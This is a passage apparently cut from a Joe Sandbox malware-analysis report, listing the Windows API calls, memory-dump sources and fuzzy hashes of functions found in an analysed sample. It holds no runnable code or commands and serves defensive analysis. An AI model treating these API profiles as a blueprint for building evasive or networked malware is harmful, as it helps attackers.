• LineTo.GDI32(?,?,?), ref: 00168894
• EndPath.GDI32(?), ref: 001688A4
• StrokePath.GDI32(?), ref: 001688B2
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: bfd306f736eb4e402a1c2d42a681992628ac4b6f161d4f9fd8a2fc9281d6621e
• Instruction ID: a4b6d6b688ed17a65166b05cfbd3beecc466b38661b749bd8b183f52feeed1a2
• Opcode Fuzzy Hash: bfd306f736eb4e402a1c2d42a681992628ac4b6f161d4f9fd8a2fc9281d6621e
• Instruction Fuzzy Hash: 1BF0823A041258FBDB126F94AC0DFDE3F59AF0A310F048100FA51654E2C7B555A1CFE5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetSysColor.USER32(00000008), ref: 000E98CC
• SetTextColor.GDI32(?,?), ref: 000E98D6
• SetBkMode.GDI32(?,00000001), ref: 000E98E9
• GetStockObject.GDI32(00000005), ref: 000E98F1
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
• Opcode ID: b544866ad57fbf7c05ec8d50f062c6fac8425dfed7cbbe61c2407945bbaaf855
• Instruction ID: a70b0b4d559bc0f56510dfe78b0188b55906ca58a5b2423569e8b70a613b2a9c
• Opcode Fuzzy Hash: b544866ad57fbf7c05ec8d50f062c6fac8425dfed7cbbe61c2407945bbaaf855
• Instruction Fuzzy Hash: 47E06D31244280EFDB216B78BC09BF93F61AB52336F04821AF6FA984E1C3B146909B51
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentThread.KERNEL32 ref: 00131634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,001311D9), ref: 0013163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001311D9), ref: 00131648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,001311D9), ref: 0013164F
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: e916262e6d8e76b0b425e267ff5cc087e992bf92a8a80bc832d4894349675dc8
• Instruction ID: 7ef10b06a7f907513a29e344653c8118dbe9f64597ab333f3b562a0eb6b73694
• Opcode Fuzzy Hash: e916262e6d8e76b0b425e267ff5cc087e992bf92a8a80bc832d4894349675dc8
• Instruction Fuzzy Hash: 87E08675601211EBD7201FE19D0DB673B7CAF54791F14480CF685C9080D7B44480C790
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 0012D858
• GetDC.USER32(00000000), ref: 0012D862
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0012D882
• ReleaseDC.USER32(?), ref: 0012D8A3
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 611712b47ed9964a863c42a9af8db61d4ea92abc8edccf1fcf16fd0236f3b016
• Instruction ID: 8cf181105aba8ca0b2e7af4db4ad01466a0166e64a84612eff644ac8e8871d7f
• Opcode Fuzzy Hash: 611712b47ed9964a863c42a9af8db61d4ea92abc8edccf1fcf16fd0236f3b016
• Instruction Fuzzy Hash: D0E01AB5800205DFDB419FA0DC08A7DBBB1FB08310F14901AF88AE7750C7B85991AF94
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 0012D86C
• GetDC.USER32(00000000), ref: 0012D876
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0012D882
• ReleaseDC.USER32(?), ref: 0012D8A3
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00144ED4
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 000FE30D
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00000000), ref: 000EF2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 000EF2BB
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001557E0
• _wcslen.LIBCMT ref: 001557EC
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
• Opcode ID: e42e231a597b343154be5b91e5c16c75436db604c180a11a0e00afa184efd810
• Instruction ID: d9a02b11d90ec4eb3d1e802c6dd61745f149e411203ad82d26d15702cac28e2a
• Opcode Fuzzy Hash: e42e231a597b343154be5b91e5c16c75436db604c180a11a0e00afa184efd810
• Instruction Fuzzy Hash: EF41B371E00209DFCB04DFA9C8919FEBBB6EF59311F104029E815AB252D7719D85CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 0014D130
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0014D13A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: 4950a1097751821405f18feb08dac06e15ab70da3a1428f932043e37aeb00f76
• Instruction ID: e3025e6e98bc70023649ebf9b813132bd4b3bc0939e23543d286eceb6e57e745
• Opcode Fuzzy Hash: 4950a1097751821405f18feb08dac06e15ab70da3a1428f932043e37aeb00f76
• Instruction Fuzzy Hash: DF312C75D00209ABCF15EFA4DC85AEE7FB9FF04300F00005AF915A6262DB31AA46DB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00163621
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0016365C
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: d95a9393b301470eda84a80780492cea6f968f809d91653e8d3f9b19e7469844
• Instruction ID: 9bd5031ebb41d5b393561bbec0908a0b1a15a4959b6bbad2854060d5d6f5c5aa
• Opcode Fuzzy Hash: d95a9393b301470eda84a80780492cea6f968f809d91653e8d3f9b19e7469844
• Instruction Fuzzy Hash: 61319C71100204AEEB109F68DC80EFB73A9FF88764F00961AF9A597290DB71ADA1D760
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0016461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00164634
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: c5bd822346b815e7f6ecc7a3544e6eba1b6a62d16370227f72d388ab63c5aff1
• Instruction ID: bbda845c6c378138de1062fb67ba63d671eaaf52f37bdd6878067a9c93f35a07
• Opcode Fuzzy Hash: c5bd822346b815e7f6ecc7a3544e6eba1b6a62d16370227f72d388ab63c5aff1
• Instruction Fuzzy Hash: 60312A74A0130AAFDF14CFA9C990BDA7BB5FF49300F14406AE905AB351D770A951CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0016327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00163287
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: fbb895e141b80363256de4a925083fd0f22fa5d334a46fd2765f879f3fae3c57
• Instruction ID: 488cd0625b70c60f519f6610ece1aee924ce926380984a8cce7a5b891e78b076
• Opcode Fuzzy Hash: fbb895e141b80363256de4a925083fd0f22fa5d334a46fd2765f879f3fae3c57
• Instruction Fuzzy Hash: 9C11B2713002087FFF259E54DC90EFB3BAAEB953A4F104129F928972D0D7719D618760
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
  • Part of subcall function 000D600E: GetStockObject.GDI32(00000011), ref: 000D6060
  • Part of subcall function 000D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
• GetWindowRect.USER32(00000000,?), ref: 0016377A
• GetSysColor.USER32(00000012), ref: 00163794
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: b5e11a5c5f688c66fd413a1f0ab6583e4765eacfcfde587fac03adb056236065
• Instruction ID: b825c3020376c39e8e82f9c18954458be8fb66e95526fc1313e7bcb371ff6551
• Opcode Fuzzy Hash: b5e11a5c5f688c66fd413a1f0ab6583e4765eacfcfde587fac03adb056236065
• Instruction Fuzzy Hash: 41113AB2610209AFDF01DFA8CC45EFA7BB8FB09354F004515FD66E2250D775E8619B60
Uniqueness
• Uniqueness Score: -1.00%

APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0014CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0014CDA6
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 039fd44e96662738ac007910b00c7942bd1def16a36f11ff45d9952af395a44a
• Instruction ID: 29b36c9c1b7ecadd15c71ab23d7dd4128c688d6cc66784b42befb37890ce21a0
• Opcode Fuzzy Hash: 039fd44e96662738ac007910b00c7942bd1def16a36f11ff45d9952af395a44a
• Instruction Fuzzy Hash: 6C11E571A06635BAD7784BA68C49FF7BEACEF127A4F00423AF159830A0D7709840D6F0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetWindowTextLengthW.USER32(00000000), ref: 001634AB
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001634BA
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 5a9b5d90fd91e05927aa59b5362475416bb0db415ac85a2f874fa1cfeb955401
• Instruction ID: 30721229e2c4bf0c26f39824c41169b1a41147b943e2c15e3634664bb731e8a1
• Opcode Fuzzy Hash: 5a9b5d90fd91e05927aa59b5362475416bb0db415ac85a2f874fa1cfeb955401
• Instruction Fuzzy Hash: 5B116A71100208AAEB128E64DC84AFB7B6AEB15378F504324FA71931E0CB71DCA19B60
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• CharUpperBuffW.USER32(?,?,?), ref: 00136CB6
• _wcslen.LIBCMT ref: 00136CC2
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
• Opcode ID: 61782330c675589d1487eb87066d52b546c326d47365c01d5e3147c9969d0333
• Instruction ID: 58c4100b16f816a642792c9a2f5f75367546d738f6efb3c6a3c0f9a73a69488e
• Opcode Fuzzy Hash: 61782330c675589d1487eb87066d52b546c326d47365c01d5e3147c9969d0333
• Instruction Fuzzy Hash: D1012632600526ABCB209FFDDC808BF73B5FB61714F014529E89297292EB31D800C750
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00131D4C
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 24436ff10649205355d1098a83ce7f660ff45e2b92caf8342d97e65da578430d
                                                                                                                                                                                                                                          • Instruction ID: 07685f233d1dc3bdf0afa24aca2cb1141f71d8542a9bb0c799c2674f162282e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24436ff10649205355d1098a83ce7f660ff45e2b92caf8342d97e65da578430d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8701B171601218ABCB08EBA4DC558FE73A9EB57360F440A1AF872673C2EF3059088760
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00131C46
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: d65359fff1450aa6c20dd417d21877e00a92c7f3f67c957a1553992e402005a8
• Instruction ID: 451a38ce383dc935b6d09b5033a5fff71f5a009553d0a7b188f5c0745f6b1b07
• Opcode Fuzzy Hash: d65359fff1450aa6c20dd417d21877e00a92c7f3f67c957a1553992e402005a8
• Instruction Fuzzy Hash: E501A775781204B6DF08EBA1C9529FF77A99B11340F14101AF41677282EB609F0897B5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00131CC8
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 7275983300c1876e75a0046ca7901baa13208591749c32b6e74cf2ea7eb5df61
• Instruction ID: 319a1503bf9f2a806eb0db1eec6a65b9c4374a041c39ad0f23d4dc7bf9adc4aa
• Opcode Fuzzy Hash: 7275983300c1876e75a0046ca7901baa13208591749c32b6e74cf2ea7eb5df61
• Instruction Fuzzy Hash: 2C01D67178021877DF04EBA0CA02AFE73A99B21340F541016B80273382EB609F09D671
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00131DD3
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 7683a22e501aa569e55f20b9de891e9b0e925c523d3883f18e18c42ad535658f
• Instruction ID: 9aef0498af87a29cd6c9c81c82eb1dd09e6ad2d78bfa75e6b6a6f7051d98215e
• Opcode Fuzzy Hash: 7683a22e501aa569e55f20b9de891e9b0e925c523d3883f18e18c42ad535658f
• Instruction Fuzzy Hash: 78F0AF71B5131876DB08E7E4DC56AFE77A8AF12750F44091AB822633C2EB605A0882B4
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
